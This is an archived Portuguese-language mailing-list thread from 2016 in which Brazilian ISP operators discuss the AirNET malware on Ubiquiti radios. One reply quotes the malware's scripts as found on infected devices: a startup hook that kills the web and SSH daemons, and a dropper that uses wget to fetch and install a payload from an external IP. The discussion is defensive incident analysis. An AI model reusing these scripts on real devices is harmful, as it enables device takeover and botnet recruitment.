[GTER] RES: Vírus ubnt
Márcio Elias Hahn do Nascimento
marcio at sulonline.net
Thu Oct 13 10:51:07 -03 2016
Obrigado pelas informações Alexandre.
Realmente não tive nenhum
equipamento com esse problema.
Versões entre 4x (equipamentos beem
antigos antes da linha MiMo, poucos, mais tem...) e todos os tipos de
5.x (embora a grande maioria seja 5.6.6).
Detalhe.
Todas as portas
entre 0-1024 estão fechadas para o mundo e abertas apenas para uma rede
de gerência.
---
Att
Márcio Elias Hahn do Nascimento
(48) 8469-1819
/ 3524-0700 - marcio at sulonline.net
INOC-BR: 52977*100
GERÊNCIA DE
RECURSOS DE TIC - Sul Internet [5]
[5]
Em 13/10/2016 10:21,
Alexandre J. Correa (Onda) escreveu:
> no /etc/persistent/ deve conter
alguns arquivos, por exemplo o rc.poststart
>
> que contem:
>
>
owned() {
> sleep 10
> kill -HUP 1 1>/dev/null 2>/dev/null
> kill -9
`pidof lighttpd dropbear` 1>/dev/null 2>/dev/null
> }
>
>
/var/etc/persistent/AirNET init
> ( owned ) &
>
> há um arquivo chamado
porra.sh também, que é por onde ele baixa o 'kit'
> e executa a
instalação:
>
> #!/bin/sh
>
> rm -rf /tmp/AirNET*
> wget -q
http://5.196.50.44/mips/AirNET.tgz [4]-O /tmp/AirNET.tgz
> if [ -f
"/tmp/AirNET.tgz" ]; then
> mkdir -p /tmp/AirNET
> tar xzf
/tmp/AirNET.tgz -C /tmp/AirNET
> rm -rf /tmp/AirNET.tgz
> cd
/tmp/AirNET
> sh install.sh
> else
> echo "error: wget"
> fi
> rm -rf
/tmp/AirNET*
>
> Esta variante o desenvolvedor foi mais inteligente,
ele compilou o
> daemon, dificultando a identificação do que ele faz...
consegui
> decodificar e ele entra em uma rede de IRC e provavelmente
recebe
> comandos pelo IRC mesmo. Imagino que o cara deva ter uma
botnet grande !!!
>
> Em 13/10/2016 09:56, Márcio Elias Hahn do
Nascimento escreveu:
>
>> Pessoal, a discussão está muito dispersa e
com muitas informações desencontradas. Qual a assinatura desse vírus?
(como eu digo que um equipamento está ou não infectado? Arquivos
alterados/criados, perda de acesso, alteração de portas, etc). O ideal
seria um posicionamento definitivo sobre isso. Outra, sobre a versão
segura ou não, é utopia, segurança da informação não existe a nível de
100%, então chego a 2 conclusões. 1 - Não vou sair atualizando milhares
de equipamentos. 2 - Vou tratar de fechar a porta para não entrar quem
não deve. --- Att Márcio Elias Hahn do Nascimento (48) 8469-1819 /
3524-0700 - marcio at sulonline.netINOC-BR: 52977*100 GERÊNCIA DE RECURSOS
DE TIC - Sul Internet [3] [3] Em 13/10/2016 08:43, Adriano B. Lima
escreveu:
>>
>>>> Há um novo virus, chamado AirNET, ele consegue
capturar as senhas
>> digitadas.. e utliza além da senhas padrões, as
senhas capturadas para acesso aos radios.. ele bloqueia ssh e web...
somente reset para remover... Fwd: a
>>
>>> Alexandre, resetando o
equipamento limpa este
>> vírus ou é preciso algum procedimento de
remoção? Outra pergunta, as versões 5.6.9 também estão
alexandre at onda.net.br> escreveu:
https://eng.registro.br/mailman/listinfo/gter[1] -- gter list
http://www.sulinternet.net [3] -- gter list
https://eng.registro.br/mailman/listinfo/gter [2]
>>
>>>
>
> --
>
Fwd: a
>
> *Alexandre Jeronimo Correa* / CEO
> _alexandre at onda.net.br
<mailto:alexandre at onda.net.br>_ / Office +55 34
> 3351 - 3077
>
>
*ONDA INTERNET*
> +55 34 3351-3077
> Av. Benedito Valadares, 217 -
Centro - Sacramento - MG - BR
> _http://www.onda.net.br
<http://www.onda.net.br/ [1]>_
>
> --
> gter list
https://eng.registro.br/mailman/listinfo/gter [2]
Links:
------
[1]
http://www.onda.net.br/
[2]
https://eng.registro.br/mailman/listinfo/gter
[3]
https://eng.registro.br/mailman/listinfo/g<div>
> ng.registro.br/mailman/listinfo/gter">https://eng.registro.br/mailman/listinfo/gter [2] http://ww
</div>/</a>[3]<ahref=
[4]
http://5.196.50.44/mips/AirNET.tgz
[5] http://www.sulinternet.net
More information about the gter
mailing list